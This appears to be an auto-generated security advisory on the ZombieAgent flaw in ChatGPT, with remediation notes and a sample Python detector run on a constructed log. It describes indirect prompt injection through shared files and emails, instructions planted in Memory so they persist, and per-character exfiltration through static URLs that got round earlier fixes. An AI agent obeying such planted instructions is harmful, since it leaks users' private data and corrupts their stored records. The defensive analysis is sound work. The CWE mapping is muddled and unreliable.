Full Report
Happy Groundhog Day! Security researchers at Radware say they've identified several vulnerabilities in OpenAI's ChatGPT service that allow the exfiltration of personal information.…
Analysis Summary
# Vulnerability: Persistent Indirect Prompt Injection Leading to Data Exfiltration (ZombieAgent)
## CVE Details
- CVE ID: Not explicitly provided in summary. Relates to vulnerabilities disclosed in September/December 2025.
- CVSS Score: Not explicitly provided. Implied high severity due to data exfiltration potential.
- CWE: CWE-787 (Out-of-bounds Write) or related to improper input validation/command injection if system instructions are considered commands, but most closely aligns with **CWE-16: Improper Input Validation** concerning untrusted content triggering agent actions.
## Affected Systems
- Products: OpenAI ChatGPT Service (specifically components related to Deep Research, Connectors/External Services, and Memory features).
- Versions: Undisclosed specific versions affected prior to fixes implemented on December 16, 2025 (and prior dates).
- Configurations: Systems leveraging external service integration (Connectors) and the ChatGPT memory feature while processing untrusted content (e.g., summaries of emails in linked services like Gmail, Outlook, Google Drive, GitHub).
## Vulnerability Description
The core vulnerability is an evolution of an **Indirect Prompt Injection** flaw, initially tracked as ShadowLeak, which allowed untrusted content embedded in data processed by ChatGPT to contain malicious instructions executed by the model.
The subsequent vulnerability, **ZombieAgent**, bypasses initial mitigations (preventing dynamic URL modification) by exploiting the interaction between three components: untrusted content, Connectors (external network access), and Memory.
1. **Exfiltration:** Data is exfiltrated character-by-character by referencing a series of pre-constructed, static external URLs, each corresponding to one text character, bypassing logic designed to stop dynamic URL construction.
2. **Persistence/Automation:** Attackers can inject configuration instructions via files shared with ChatGPT. These instructions persist in memory, compelling the agent to automatically read untrusted input (like emails) and leak stored sensitive data (stored via other memory instructions) before responding to the user, achieving persistence without user intervention after the initial setup.
3. **Data Tampering:** The vulnerability also allows for modification of stored user data (e.g., medical history) to cause the model to emit incorrect advice.
## Exploitation
- Status: PoC available (Demonstrated by Radware researchers). Attackers are reported to be exploiting related structural weaknesses.
- Complexity: Medium (Requires chaining multiple features: untrusted input, static URL selection, and memory manipulation).
- Attack Vector: Network (Via processing external data or initiating network requests through connectors).
## Impact
- Confidentiality: High (Allows unauthorized exfiltration of sensitive user data stored in memory or accessible via linked services).
- Integrity: High (Allows modification of stored facts/history, leading to erroneous decisions/advice).
- Availability: Low (Primary impact is not denial of service, but data manipulation/theft).
## Remediation
### Patches
- OpenAI implemented fixes on or around December 16, 2025 (and on earlier dates): the initial ShadowLeak fix prevented dynamic URL modification, and subsequent fixes attempted to block simultaneous use of Connectors and Memory and to block opening URLs from Memory.
- *Note: The article implies subsequent patches were bypassed by ZombieAgent, meaning the fundamental model handling of untrusted instructions remains the root issue.*
### Workarounds
- **Disabling Feature Chaining:** Temporarily, enterprises should ensure that ChatGPT sessions utilizing external Connectors (network access) do not simultaneously access user data stored in Memory.
- **Disallowing URL Opening from Memory:** Verify that memory access does not trigger network operations initiated by external content or instructions stored in memory.
## Detection
- **Indicators of Compromise (IOCs):** High volume of successive, slightly varying outbound network requests to external servers using attacker-controlled domains (if the specific static URLs can be fingerprinted). Unanticipated network activity originating from the ChatGPT service environment tied to user sessions.
- **Detection Methods and Tools:** Advanced logging and monitoring of connector/API calls originating from the AI session, specifically looking for chained actions involving Read Memory → Trigger Connector → Write/Send Data. Behavioral analysis tools monitoring for memory manipulation instructions disguised as system context.
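The following is an added detection example, not code from Radware or OpenAI. It runs the Read Memory → Trigger Connector chain check described above over a constructed per-session action log (the log format, the `sess=`/`action=` fields and the `attacker.example` host are assumptions for illustration) and flags a session that, after reading memory, issues a burst of connector fetches to static URLs that differ only in a one-character final path segment.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample agent action log (hypothetical format, not real ChatGPT telemetry).
SAMPLE_LOG = """\
sess=42 action=memory.read key=user_profile
sess=42 action=connector.fetch url=https://attacker.example/c/a
sess=42 action=connector.fetch url=https://attacker.example/c/l
sess=42 action=connector.fetch url=https://attacker.example/c/i
sess=42 action=connector.fetch url=https://attacker.example/c/c
sess=42 action=connector.fetch url=https://attacker.example/c/e
sess=42 action=connector.fetch url=https://attacker.example/c/@
sess=43 action=memory.read key=user_profile
sess=43 action=connector.fetch url=https://docs.example.com/report.pdf
sess=44 action=connector.fetch url=https://attacker.example/c/x
sess=44 action=connector.fetch url=https://attacker.example/c/y
"""

LINE_RE = re.compile(r"sess=(\S+) action=(\S+)(?: \S+=(\S+))?")

def parse_events(log):
    """Yield (session, action, argument) tuples from the constructed log."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.group(1), m.group(2), m.group(3)

def single_char_prefix(url):
    """If the URL's last path segment is exactly one character, return the static
    prefix shared by a per-character exfiltration series; otherwise None."""
    p = urlparse(url)
    head, _, tail = p.path.rpartition("/")
    if len(tail) == 1:
        return f"{p.scheme}://{p.netloc}{head}/"
    return None

def find_char_exfil(log, threshold=5):
    """Flag sessions where a memory read is followed by >= threshold fetches
    to one-character URLs sharing a prefix (repeated characters count)."""
    memory_read = set()
    buckets = defaultdict(lambda: defaultdict(int))  # sess -> prefix -> request count
    for sess, action, arg in parse_events(log):
        if action == "memory.read":
            memory_read.add(sess)
        elif action == "connector.fetch" and arg and sess in memory_read:
            prefix = single_char_prefix(arg)
            if prefix:
                buckets[sess][prefix] += 1
    findings = {}
    for sess, prefixes in buckets.items():
        for prefix, count in prefixes.items():
            if count >= threshold:
                findings[sess] = {"prefix": prefix, "requests": count}
    return findings
```

Session 44 is not flagged because no memory read precedes its fetches, which keeps the rule tied to the Memory-to-Connector chain rather than to short URLs alone.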
## References
- Vendor advisories: Information related to Radware's disclosure filed September 26, 2025, and fixes implemented in September and December 2025.
- Relevant links (defanged):
  - Radware security blog discussing the finding (implied from text).
  - OpenAI disclosures regarding fixes on September 3rd and December 16th.